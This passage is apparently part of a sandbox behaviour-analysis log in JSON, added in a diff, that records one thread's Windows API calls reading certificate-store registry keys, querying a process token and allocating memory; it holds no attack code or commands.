"caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000680" + }, + { + "name": "KeyInformation", + "value": "\\xffeda\\xffa1\\xffaa\r~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 2442 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000680" + } + ], + "repeated": 0, + "id": 2443 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000680" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000554" + }, + { + "name": "ObjectAttributesName", + "value": "CRLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\TrustedPeople\\CRLs" + } + ], + "repeated": 0, + "id": 2444 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000680" + }, + { + "name": "KeyInformation", + "value": "\\xffeda\\xffa1\\xffaa\r~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 2445 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000680" + } + ], + "repeated": 0, + "id": 2446 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000680" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000554" + }, + { + "name": "ObjectAttributesName", + "value": "CTLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\TrustedPeople\\CTLs" + } + ], + "repeated": 0, + "id": 2447 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000680" + }, + { + "name": "KeyInformation", + "value": "\\xffeda\\xffa1\\xffaa\r~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 2448 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000680" + } + ], + "repeated": 0, + "id": 2449 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ad70b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 2450 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000684" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Policies\\Microsoft\\SystemCertificates\\TrustedPeople" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\SystemCertificates\\TrustedPeople" + } + ], + "repeated": 0, + "id": 2451 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000688" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000684" + }, + { + "name": "ObjectAttributesName", + "value": "Certificates" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\TrustedPeople\\Certificates" + } + ], + "repeated": 0, + "id": 2452 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000688" + }, + { + "name": "KeyInformation", + "value": "\\xffeda\\xffa1\\xffaa\r~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 2453 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000688" + } + ], + "repeated": 0, + "id": 2454 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000688" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000684" + }, + { + "name": "ObjectAttributesName", + "value": "CRLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\TrustedPeople\\CRLs" + } + ], + "repeated": 0, + "id": 2455 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000688" + }, + { + "name": "KeyInformation", + "value": "\\xffeda\\xffa1\\xffaa\r~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 2456 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000688" + } + ], + "repeated": 0, + "id": 2457 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000688" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000684" + }, + { + "name": "ObjectAttributesName", + "value": "CTLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\TrustedPeople\\CTLs" + } + ], + "repeated": 0, + "id": 2458 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000688" + }, + { + "name": "KeyInformation", + "value": "\\xffeda\\xffa1\\xffaa\r~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 2459 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000688" + } + ], + "repeated": 0, + "id": 2460 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767e8258", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000684" + } + ], + "repeated": 0, + "id": 2461 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000690" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000558" + }, + { + "name": "ObjectAttributesName", + "value": "Certificates" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\TrustedPeople\\Certificates" + } + ], + "repeated": 0, + "id": 2462 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000690" + }, + { + "name": "KeyInformation", + "value": "\\xffeda\\xffa1\\xffaa\r~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 2463 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000690" + } + ], + "repeated": 0, + "id": 2464 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000690" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000558" + }, + { + "name": "ObjectAttributesName", + "value": "CRLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\TrustedPeople\\CRLs" + } + ], + "repeated": 0, + "id": 2465 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000690" + }, + { + "name": "KeyInformation", + "value": "\\xffeda\\xffa1\\xffaa\r~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 2466 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000690" + } + ], + "repeated": 0, + "id": 2467 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000690" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000558" + }, + { + "name": "ObjectAttributesName", + "value": "CTLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\TrustedPeople\\CTLs" + } + ], + "repeated": 0, + "id": 2468 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000690" + }, + { + "name": "KeyInformation", + "value": "\\xffeda\\xffa1\\xffaa\r~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 2469 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000690" + } + ], + "repeated": 0, + "id": 2470 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ad70b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 2471 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000690" + }, + { + "name": "DesiredAccess", + "value": "0x00020119", + "pretty_value": "KEY_QUERY_VALUE|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|KEY_WOW64_64KEY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate" + } + ], + "repeated": 0, + "id": 2472 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000690" + }, + { + "name": "ValueName", + "value": "DisallowedCertLastSyncTime" + }, + { + "name": "Type", + "value": "3", + "pretty_value": "REG_BINARY" + }, + { + "name": "Information", + "value": "\\xec\\xdbPA\\xa1\\x8f\\xdb\\x01" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate\\DisallowedCertLastSyncTime" + } + ], + "repeated": 0, + "id": 2473 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x767e81e7", + "parentcaller": "0x767e8153", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 2474 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767e8258", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000690" + } + ], + "repeated": 0, + "id": 2475 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7705c11d", + "parentcaller": "0x7705c061", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000694" + } + ], + "repeated": 0, + "id": 2476 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b7eb6", + "parentcaller": "0x767e8775", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "29" + }, + { + "name": "TokenInformation", + "value": "\\x00\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 2477 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ba174", + "parentcaller": "0x768087e5", + "category": "process", + "api": "NtOpenProcessToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "DesiredAccess", + "value": "0x00000008" + }, + { + "name": "TokenHandle", + "value": "0x00000690" + } + ], + "repeated": 0, + "id": 2478 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b7eb6", + "parentcaller": "0x76808ab9", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "1" + }, + { + "name": "TokenInformation", + "value": "\\xa0\\xf2[\\x05\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xaa\tT\\x1e\\xa0\\x13}z\\xa7\\x1b\\x0f\\xf2\\xe9\\x03\\x00\\x00\\xb3\"\\xd6\\xfat\\xa1ku\\x88\\x8f's\\xe5\\x87\\x80v2\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\x00\\x00\\\\x05\\x00\\x00\\x00\\x00\\xbc\\xf2[\\x05\\xc8\\xf3[\\x05\\xa4\\xfd[\\x05\\x90c\\x1bst\\xa1ku\\x88\\x8f's8\\xf3[\\x05\\xdb\\x9e\\x06slS%s$\\xb6,s\\xbcA\\x83\\x02\\x88\\x8f's\\x88\\xf3[\\x05k#\\xd6\\xfal\\xee[\\x05\\x04\\xa0\\x04s\\xa4\\xfd[\\x05\\x90c\\x1bs\\xdf!\\xab\\x8c\\xfe\\xff\\xff\\xff\\x84\\xf3[\\x05\\xe6\\xb5\\x07s9\\x00\\x00\\x00\\xbc\\x9a%s\\xdc\\xb5%s\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xd7\\xb5%s\\x9c\\xb3%s\\xff\\xff\\xff\\xff0~%s\\x08\\x00\\x00\\x00\\xc8\\xb5%s\\xc4\\xf3[\\x05 \\xf6\\xe4\\xf3\\x84\\xf3t\\xf3\\xe8\\xf3\\x00\\x00<\\xff\\x00\\x00 \\xf6[\\x05\\xe4\\xf3[\\x05\\xe8\\xf3[\\x05\\x00\\x00\\x00\\x00\\x98\\xf3[\\x05t\\xa1ku\\xff\\xff\\xff\\xff\\x08\\x00\\x00\\x00\\xc4\\xf3[\\x05" + } + ], + "repeated": 0, + "id": 2479 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ad70b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 2480 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000690" + }, + { + "name": "DesiredAccess", + "value": "0x02000000", + "pretty_value": "MAXIMUM_ALLOWED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x000002ac" + }, + { + "name": "ObjectAttributesName", + "value": "S-1-5-21-508823978-2055017376-4061076391-1001" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER" + } + ], + "repeated": 0, + "id": 2481 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000694" + }, + { + "name": "DesiredAccess", + "value": "0x00020119", + "pretty_value": "KEY_QUERY_VALUE|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|KEY_WOW64_64KEY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000690" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\Software\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate" + } + ], + "repeated": 0, + "id": 2482 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000694" + }, + { + "name": "ValueName", + "value": "DisallowedCertLastSyncTime" + }, + { + "name": "Type", + "value": "3", + "pretty_value": "REG_BINARY" + }, + { + "name": "Information", + "value": "\\xd0\\xae\\x0bA\\xa1\\x8f\\xdb\\x01" + }, + { + "name": "FullName", + "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate\\DisallowedCertLastSyncTime" + } + ], + "repeated": 0, + "id": 2483 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x767e81e7", + "parentcaller": "0x767e816f", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 2484 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ad70b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 2485 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000694" + }, + { + "name": "DesiredAccess", + "value": "0x00020119", + "pretty_value": "KEY_QUERY_VALUE|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|KEY_WOW64_64KEY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate" + } + ], + "repeated": 0, + "id": 2486 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffff80000005", + "pretty_return": "BUFFER_OVERFLOW", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000694" + }, + { + "name": "ValueName", + "value": "DisallowedCertEncodedCtl" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate\\DisallowedCertEncodedCtl" + } + ], + "repeated": 1, + "id": 2487 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x770307f7", + "parentcaller": "0x770304ff", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x0056f000" + }, + { + "name": "RegionSize", + "value": "0x00002000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 2488 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fc63b", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000694" + }, + { + "name": "ValueName", + "value": "DisallowedCertEncodedCtl" + }, + { + "name": "Type", + "value": "3", + "pretty_value": "REG_BINARY" + }, + { + "name": "Information", + "value": "0\\x82\\x16\\xc8\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x07\\x02\\xa0\\x82\\x16\\xb90\\x82\\x16\\xb5\\x02\\x01\\x011\\x0f0\r\\x06\t`\\x86H\\x01e\\x03\\x04\\x02\\x01\\x05\\x000\\x82\\x07$\\x06\t+\\x06\\x01\\x04\\x01\\x827\n\\x01\\xa0\\x82\\x07\\x150\\x82\\x07\\x110\\x0c\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x03\\x1e\\x048D\\x00i\\x00s\\x00a\\x00l\\x00l\\x00o\\x00w\\x00e\\x00d\\x00C\\x00e\\x00r\\x00t\\x00_\\x00A\\x00u\\x00t\\x00o\\x00U\\x00p\\x00d\\x00a\\x00t\\x00e\\x00_\\x001\\x00\\x00\\x00\\x02\\x08\\x01\\xdbFv^\\xc4\\xfa\\xd2\\x17\r241204180014Z0\\x0e\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x0b\\x0f\\x05\\x000\\x82\\x06\\x9c0\\x12\\x04\\x10%\\xfbz]\\x86\\xf7/^g(\\x8fys\\x05\\xfe\\x940\\x12\\x04\\x10o-Ce\\xc1\\x02\\x1f[\\x8bc\\xef\\x13+\\xc3\\xb3`0\\x12\\x04\\x10\\xad\\x11\\xdb\\xb7l\\x9c\\xf1\\xab\\x99\\x98\\xcd\\x84.\\xc1vs0\\x12\\x04\\x10\\xdf\\xbd\\xd7/\\x99\\xc3\\xb6Jy~Z\\xc9mY\\xbeV0\\x12\\x04\\x10\\xc6h\\x15K\\xe9^\\x16\\xad\\xbc2\\x1a\\xbc1n8J0\\x12\\x04\\x1079.\\x83=\\xc6\\x05\\xdd{8